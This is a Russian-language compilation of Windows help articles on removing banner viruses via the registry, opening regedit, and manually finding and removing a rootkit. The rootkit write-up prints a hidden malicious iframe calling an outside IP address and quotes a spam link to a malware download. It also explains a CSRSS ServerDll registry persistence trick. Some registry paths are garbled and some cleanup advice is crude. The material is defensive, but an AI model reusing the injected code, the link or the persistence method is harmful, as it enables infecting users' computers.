Удаляем вирус-баннер в реестре Windows
Удаляем вирус-баннер в реестре Windows
Содержание
- 1 Удаляем вирус-баннер в реестре Windows
- 2 Как открыть редактор реестра Windows
- 3 Самый быстрый способ открыть редактор реестра
- 4 Используем поиск, чтобы запустить редактор реестра
- 5 Запуск файла regedit.exe
- 6 Как открыть редактор реестра — видео
- 7 Как зайти в реестр Windows 10/8/7/XP? (Видео)
- 8 Как открыть реестр в Windows 10
- 9 Как открыть реестр в Windows 8/8.1
- 10 Как открыть реестр в Windows 7
- 11 Как открыть реестр в Windows XP
- 12 Заключение
- 13 Как найти вирус в реестре Windows 10
Во время начала загрузки компьютера нажимаем клавишу F8. И выбираем «Безопасный режим с поддержкой командной строки» и жмем «Enter»
По окончанию загрузки появится окно «Администратор :cmd.exe» где через клавиатуру введите «regedit.exe». Снова жмем «Enter» и выходим в «Редактор реестра»
В реестре Windows regedit содержится системная информация и данные об автоматическом запуске программ при старте операционной системы. Тут-то мы и попытаемся найти следы нашего баннера-вируса.
Для нормальной работы ОС необходимо всего 5 файлов в корневом каталоге:
ntldr
boot.ini
pagefile.sys
Bootfont.bin
NTDETECT.COM
Без детального анализа удалять из реестра ничего нельзя. Вы должны быть на 100% уверены, что это именно вирус а не программа которая была загружена в корневую папку. Вирус должен как-то загружаться при старте системы, как правило этот процесс происходит при автозапуске. Поэтому смотрим следующие ключи реестра на предмет подозрительных программ. (А если вы уже нашли вирус, то ищите имя файла везде в реестре и удаляйте):
С самого начала ищем вирус в цепочке:HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsNTCurrentVersionWinlogon Находим в списке запись Shell (XP) В Windows7 данного раздела нет.
Смотрим: значение параметра, по умолчанию должно быть Explorer.exe , если есть еще что то удаляем.
Теперь находим запись: Usernit (Присутствует в любой версии Windows). В значении данной записи должно быть C:Windowssystem32userinit.exe Все что есть кроме этой записи – удаляем. Естественно если ос установлена не на диск С то запись будет другая.
Следующим этапом будет редактирование автозагрузки раздела Run .
Ищем и открываем цепочку: HKEY_CURRENT_USERSoftwareMicrosoft
WindowsCurrentVersionRun (данный раздел применителен к Windows 7) В этой ветке можно удалить все, кроме антивирусного программного обеспечения и так же необходимого для вашей работы софта (утилиты для принтера, skype, сканера).
Следующая цепочка: HKEY_LOCAL_MACHINESOFTWAREMicrosoft
WindowsCurrentVersionRun Тут делаем то же самое что и в предыдущем пункте.
Возможно нужно будет заменить файл «hosts» который находится по адресу: Откройте Пуск» и введите: %systemroot%system32driversetc
Копируем стандартный с сайта разработчика http://support.microsoft.com/kb/972034/ru а старый переименовываем hosts.old.
Щелкните правой кнопкой мыши в свободном месте в папке %WinDir%system32driversetc,
выберите пункт Создать, щелкните элемент Текстовый документ, введите имя hosts/ Откройте новый файл hosts в текстовом редакторе»Блокнот» и скопируйте в файл сохраненный текст с сайта. Перегружаем компьютер.
Иногда бывает, что не требуется искать приложение.ехе в реестре Windows а достаточно только при выходе на рабочий стол произвести быструю проверку «Security Esseentiats» , сделать перезагрузку и когда включится компьютер появится окно, которое указывает имя программы, скажем 2088322.exe, которую защитник Windows не может распознать. Вам нужно будет только записать это значение в «Пуск» — «Найти программы и файлы «, а затем с помощью правой кнопки мышки выяснить адрес этого баннера и удалить его сначала в корзину а потом навсегда.
Если необходимо проверить реестр на исправном компьютере, т.е. когда ОС полностью загружена, не нужно использовать «Безопасный pежим» достаточно набрать в меню «Пуск» команду regedit и кликнуть по открывшемуся файлу, и перед вами откроется «Редактор реестра».
Но что делать если невозможно загрузить ОС в безопасном режиме, как убрать баннер и разблокировать Windows? В этом случае нам нужно прибегнуть к сторонним средствам, одним компьютером тут не обойдешся. Рассмотрим самые лучшие утилиты на сегодняшний день, которые помогут нам разблокировать наш компьютер : «Как удалить баннер если Windows не загружается в безопасном режиме»
Человек это
самый страшный вирус
на планете — Земля.
«inpropart»
inpropart.ru
Как открыть редактор реестра Windows
В этой инструкции покажу несколько способов быстро открыть редактор реестра Windows 7, 8.1 и Windows 10. Несмотря на то, что в своих статьях я стараюсь описывать все требуемые шаги очень подробно, бывает, что ограничиваюсь лишь фразой «откройте редактор реестра», которая у начинающего пользователя может вызвать необходимость искать, как это сделать. В конце инструкции также есть видео с демонстрацией способов запуска редактора реестра.
Реестр Windows представляет собой базу данных почти всех настроек ОС Windows, имеющую древовидную структуру, состоящую из «папок» — разделов реестра, и значений переменных, определяющих то или иное поведение и свойство. Для редактирования этой базы и требуется редактор реестра (например, когда нужно убрать программы из автозагрузки, отыскать вредоносное ПО, запуск которого происходит «через реестр» или, скажем, убрать стрелки с ярлыков).
Примечание: если при попытке открыть редактор реестра вы получаете сообщение о запрете этого действия, вам может помочь это руководство: Редактирование реестра запрещено администратором. В случае ошибок, связанных с отсутствием файла или тем, что regedit.exe не является приложением, вы можете скопировать этот файл с любого другого компьютера с той же версией ОС, а также найти его на своем компьютере в нескольких местах (подробнее будет описано ниже).
Самый быстрый способ открыть редактор реестра
На мой взгляд, самый быстрый и удобный способ открытия редактора реестра — использовать диалоговое окно «Выполнить», которое в Windows 10, Windows 8.1 и 7 вызывается одинаковым сочетанием горячих клавиш — Win+R (где Win — клавиша на клавиатуре с изображением эмблемы Windows).
В открывшемся окне достаточно ввести regedit после чего нажать кнопку «Ок» или просто Enter. В результате, после вашего подтверждения на запрос контроля учетных записей пользователей (если у вас включен UAC), откроется окно редактора реестра.
Что и где находится в реестре, а также о том, как его редактировать, вы можете прочитать в руководстве Использование редактора реестра с умом.
Используем поиск, чтобы запустить редактор реестра
Второй (а для кого-то и первый) по удобству способ запуска — использовать функции поиска Windows.
В Windows 7 вы можете начать вводить «regedit» в окне поиска меню «Пуск», после чего в списке кликнуть по найденному редактору реестра.
В Windows 8.1, если вы перейдете на начальный экран, а затем просто начнете набирать «regedit» на клавиатуре, откроется окно поиска, в котором можно будет запустить редактор реестра.
В Windows 10, по идее, точно так же найти редактор реестра можно через поле «Поиск в интернете и Windows», находящееся в панели задач. Но в той версии, что у меня сейчас установлена, это не работает (к релизу, уверен, исправят). Обновление: в финальной версии Windows 10, как и предполагалось, поиск успешно находит редактор реестра.
Запуск файла regedit.exe
Редактор реестра Windows является обычной программой, и, как и любую программу, его можно запустить с помощью исполняемого файла, в данном случае — regedit.exe.
Этот файл вы можете найти в следующих расположениях:
- C:Windows
- C:WindowsSysWOW64 (для 64-разрядных версий ОС)
- C:WindowsSystem32 (для 32-битных)
Помимо этого, в 64-разрядных Windows вы также обнаружите файл regedt32.exe, эта программа тоже является редактором реестра и работает, в том числе и в 64-битной системе.
Дополнительно, редактор реестра вы можете отыскать и в папке C:WindowsWinSxS , для этого удобнее всего использовать поиск по файлам в проводнике (это расположение может пригодиться, если в стандартных местах редактора реестра вы не обнаружили).
Как открыть редактор реестра — видео
В завершение — видео, в котором показываются способы запустить редактор реестра на примере Windows 10, однако способы подойдут и для Windows 7, 8.1.
Также существуют и сторонние программы для редактирования реестра Windows, которые в некоторых ситуациях могут оказаться полезными, но это тема отдельной статьи.
А вдруг и это будет интересно:
Почему бы не подписаться?
Рассылка новых, иногда интересных и полезных, материалов сайта remontka.pro. Никакой рекламы и бесплатная компьютерная помощь подписчикам от автора. Другие способы подписки (ВК, Одноклассники, Телеграм, Facebook, Twitter, Youtube, Яндекс.Дзен)
03.05.2016 в 19:56
помогите у меня все файлы открываются через яндекс. как исправить?
04.05.2016 в 09:13
Здравствуйте. Восстановить ассоциации файлов.
Поищите в интернете: восстановление ассоциаций файлов Windows + версия вашей ОС.
30.05.2016 в 17:39
Никакими способами не открывается редактор реестра, даже из корня папки с админскими правами, в чём может быть дело?
31.05.2016 в 09:59
Какие-либо сообщения при этом показывает?
31.05.2016 в 17:38
Вообще ничего. При чём удалял значёк Винды 10 с трея, исчез до сегодня, сейчас опять висит. Подозреваю что обновление которое я удалил снова качнулось, комп лагает не по детски. Сейчас по-пробую ССклинер качнуть, может он реестр откроет. Хотя очень странно что даже с ком строки не запускает
Даже СиКлинер не открывает
04.06.2016 в 21:27
Помогите, пожалуйста! Не запускались скаченные недавно файлы exe (игры), где-то прочитала, что нужно поменять значение regedit.exe с exefile и перезагрузить компьютер. Теперь вообще почти все мои программы не запускаются, в том числе regedit.exe, как зайти в реестр и вернуть значение?
05.06.2016 в 08:26
Можно загрузиться с загрузочного диска Windows, там нажать Shift+F10, откроется командная строка, в ней ввести regedit, откроется редактор реестра, потом в нем загрузить файлы реестра из системы на компьютере (про расположение этих файлов: goo.gl/E0iYcl )
17.06.2016 в 16:43
Добрый день.
Есть ли способ запуска редактора через файл приложения? Проблема в том, что ни одно приложение на компьютере не открывается через .exe файл, но зато открывается через файлы ассоциированные с приложениями (например .doc с MS Word, .pdf с acrobat reader и т.д.). Это не вирус, но чтобы избавиться от этого, необходимо отредактировать реестр. Но все описанные в статье способы запускают редактор только через .exe файл.
18.06.2016 в 09:15
Здравствуйте. Вы можете это сделать не редактируя реестр вручную, а с помощью reg файла. Например, это описано здесь https://remontka.pro/file-associations-windows-10/
06.08.2016 в 18:33
Ремонта помогите, не одним способом не запускается реестр, посмотрел как запустить,команда gpedit.msc тоже не работает,что мне делать?
И все это усложняет ещё то что у меня вирус в реестре, нет рабочего стола, просто чёрный экран
07.08.2016 в 08:42
А диспетчер задач открывается? А в нем если новая задача — explorer.exe — работает?
Примечание: после отправки комментария он не появляется на странице сразу. Всё в порядке — ваше сообщение получено. Ответы на комментарии и их публикация выполняются ежедневно днём, иногда чаще. Возвращайтесь.
remontka.pro
Как зайти в реестр Windows 10/8/7/XP? (Видео)
Многие начинающие пользователи задаются вопросом, как зайти в реестр Windows 10, 8, 7 или XP. Сколько не перебирай пункты меню «Пуск», ярлык на реестр в нём не найти! Как же открыть реестр в Windows?
Дело в том, что любое необдуманное изменение в реестре может привести к катастрофическим последствиям для вашего компьютера. Чтобы неопытные пользователи не натворили бед, доступ в реестр был скрыт.
Дайте себе слово, что не будете делать необдуманных изменений в реестре, чтобы не навредить своему компьютеру!
Подробности о том, что такое реестр, как он устроен, и как его можно использовать, можно прочитать в этом уроке.
Для любой версии Windows есть несколько способов запуска программы, в которой можно изменять настройки реестра (она называется «редактор реестра»).
Как открыть реестр в Windows 10
Начнём с самой свежей Windows 10, и рассмотрим два варианта доступа к реестру.
Запуск редактора реестра — способ 1 для Windows 10
- Нажмите кнопку «Пуск» левой кнопкой мыши (или клавишу «Windows» на клавиатуре);
- Когда откроется меню «Пуск», наберите на клавиатуре команду «regedit» (без кавычек);
- В верхней части меню поиска под надписью «Лучшее соответствие» появится пункт «REGEDIT – Выполнить команду», нажмите на этот пункт левой кнопкой мыши;
- Если появилось окно подтверждения запуска редактора реестра, нажмите «Да»;
Перед вами появится окно «Редактора реестра», в котором можно вносить изменения в сам реестр.
Запуск редактора реестра в Windows 10
Запуск редактора реестра — способ 2 для Windows 10
- Нажмите кнопку «Пуск» правой кнопкой мыши (или сочетание клавиш Win+X);
- В появившемся меню выберите пункт «Выполнить» (эти два шага можно заменить одним сочетанием клавиш Win+R);
- В появившемся окошке «Выполнить» наберите «regedit» (без кавычек) и нажмите кнопку «ОК»;
- В окне подтверждения запуска, нажмите «Да»;
Появится окно «Редактора реестра», и можно преступать к внесению изменений.
Наглядно увидеть, как зайти в реестр Winows 10, можно на этом видео:
Как открыть реестр в Windows 8/8.1
Для запуска редактора реестра в Windows 8 нужно выполнить те же шаги, что и в Windows 10, если у вас версия 8, а не 8.1, то кнопки «Пуск» у вас нет, поэтому на первом шаге первого способа нажмите клавишу «Windows», а дальше всё по инструкции выше.
Подробная видео-инструкция, как зайти в редактор реестра Windows 8 (8.1):
Как открыть реестр в Windows 7
Чтобы открыть редактор реестра в Windows 7, нужно сделать похожие шаги:
Запуск редактора реестра — способ 1 для Windows 7
- Нажать на «Пуск» левой кнопкой мыши;
- Набрать команду «regedit» (без кавычек);
- Нажать в верхней части меню, под надписью «Программы» на надписи «regedit»;
- На запрос о подтверждении запуска выбрать ответ «Да».
Запуск редактора реестра — способ 2 для Windows 7
- Нажать на клавиатуре сочетание клавиш Win+R (зажмите клавишу Windows и, не отпуская её, нажмите клавишу R);
- В окошке «Выполнить» набрать команду «regedit» (без кавычек) и нажать кнопку «ОК»;
- Подтвердить запуск редактора реестра кнопкой «Да».
Оба способа входа в редактор реестра Windows 7 можно увидеть на этом видео:
Как открыть реестр в Windows XP
В Windows XP открытие редактора реестра несколько отличается:
Запуск редактора реестра — способ 1 для Windows XP
- Нажать на «Пуск» левой кнопкой мыши;
- В правой колонке найти пункт «Выполнить» (оба шага можно заменить сочетанием Win+R)
- В окошке «Запуск программы» написать команду «regedit» (без кавычек) и нажать кнопку «ОК»;
Запуск редактора реестра в Windows XP
Запуск редактора реестра — способ 2 для Windows XP (и не только)
- Откройте проводник (можно воспользоваться сочетанием клавиш Win+X);
- Перейдите на диск «C:»;
- Откройте папку Windows;
- Найдите файл «regedit» и запустите его.
И, конечно, видеоверсия открытия программы редактирования реестра в Windows XP:
Второй способ подходит для всех перечисленных версий «Виндовс». Более того, вы можете немного схитрить:
Добравшись до файла «regedit» вы можете создать ярлык на рабочем столе и в дальнейшем значительно упростить доступ к Редактору реестра.
Подробности о том, что такое реестр и как он устроен, вы можете узнать здесь.
Заключение
Сегодня вы узнали, как зайти в реестр во всех актуальных версиях ОС Windows.
В сумме набралось три способа:
- Поиск через меню «Пуск» вводом команды «regedit»
- С помощью команды «Выполнить» и ввода «regedit»
- Открытие файла «regedit», находящегося в папке C:Windows
И один дополнительный способ: добравшись до файла «regedit» (третьим способом), создать ярлык на Рабочем столе.
В следующем уроке я планирую рассмотреть способ сохранения (резервного копирования) отдельных частей реестра перед их изменением.
Интересно? Пишите в комментариях, задавайте вопросы, и, конечно, делитесь ссылкой в социальных сетях и подписывайтесь на новости!
Копирование запрещено, но можно делиться ссылками:
it-uroki.ru
Как найти вирус в реестре Windows 10
Что делать, если антивирус не справился со своей работой.
    Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или . много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус — это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) — гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами — не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.
Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден — должна быть запущена какая-то программа. Идеально — с административными правами, желательно — без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. — большинство грамотных пользователей данную опцию отключили навсегда.
Для отключения функций автозапуска в Windows XP/2000 здесь reg-файл для импорта в реестр.
Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета «Автозапуск» панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:
    Но основным «поставщиком» вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение — «Обозреватель Интернета» (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс — интерпретатор данных, полученных извне. Другими словами, — в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать «сайты для взрослых», сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами «скачать бесплатно» и » скачать без регистрации и SMS». Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.
    Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR’ом, а изменения в реестре отменены PT Startup Monitor’ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:
iframe src=»http://91.142.64.91/ts/in.cgi?rut4″ w
означающий выполнение CGI-сценария сервера с IP — адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат — вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега «iframe» сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.
    В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами — так называемые руткит (rootkit) — технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.
    Удаление «качественного» вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами — вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, — все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.
    Развитие антивирусов тоже не стоит на месте, — они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет «не по зубам» любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса — это работа, которую рано или поздно придется выполнять любому пользователю компьютера.
Для примера я взял вирус, ссылку на который получил в спам-письме, следующего содержания:
Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe
    Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.
    Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
    Скачиваю файл resume.exe. Размер — 159744 байта. Пока не запускаю.
    Копирую файл на другие компьютеры, где установлены различные антивирусы — просто для очередной проверки их эффективности. Результаты не ахти — антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec’у — та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
    Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
    Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
    Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) — надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark’ом) выдает то, что есть на самом деле.
    Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку — системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении — так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.
Определяем наличие вируса в системе.
1.     Наверняка должен быть «левый» трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось — один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.
2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных — RootkitRevealer Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем «Scan». После непродолжительного сканирования видим результаты:
    Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень «свежие» по времени создания/модификации записи или файлы (колонка «Timestamp») . Нас в первую очередь должны заинтересовать файлы с описанием (колонка «Description» ) — «Hidden from Windows API» — скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений — это, естественно, ненормально. Два файла — grande48.sys и Yoy46.sys — это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала — это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке system32 , а их копии в system32dllcache остались видимыми.
    Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP — автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка system32dllcache и, отчасти, Windowsdriver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует «правильную» его копию из папки dllcache. Если указанный файл отсутствует в папке dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в dllcache и его не видно в system32 — это тоже дополнительный признак наличия руткита в системе.
Удаляем вирус из системы.
    Осталось выполнить самое важное действие — удалить вирус. Самый простой и надежный способ — загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.
Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню — жмем R.
Выбираем систему (если их несколько):
Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:
В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:
Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:
    Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда — http://freedrweb.ru
    Там же можно скачать «Dr.Web LiveCD» — образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением WindowsUnix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением .iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.
    Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим «Выборочная проверка»). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
    Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlSafeBoot
Разделы:
Minimal — список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
Network — то же, но с поддержкой сети.
Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше RootkitRevealer загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и , естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.
    Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com. Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора «лучшего антивируса».
Здесь ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн — проверок компьютера, браузера, файлов.
    Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается «Диспетчер сеансов» (SystemRootSystem32smss.exe) , задача которого — запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра
    Информация, предназначенная для диспетчера сеансов, находится в ключе реестра
HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlSession Manager
Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи
HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlSession ManagerSubSystems
то найдете значения
ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll — это «правильные» файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:
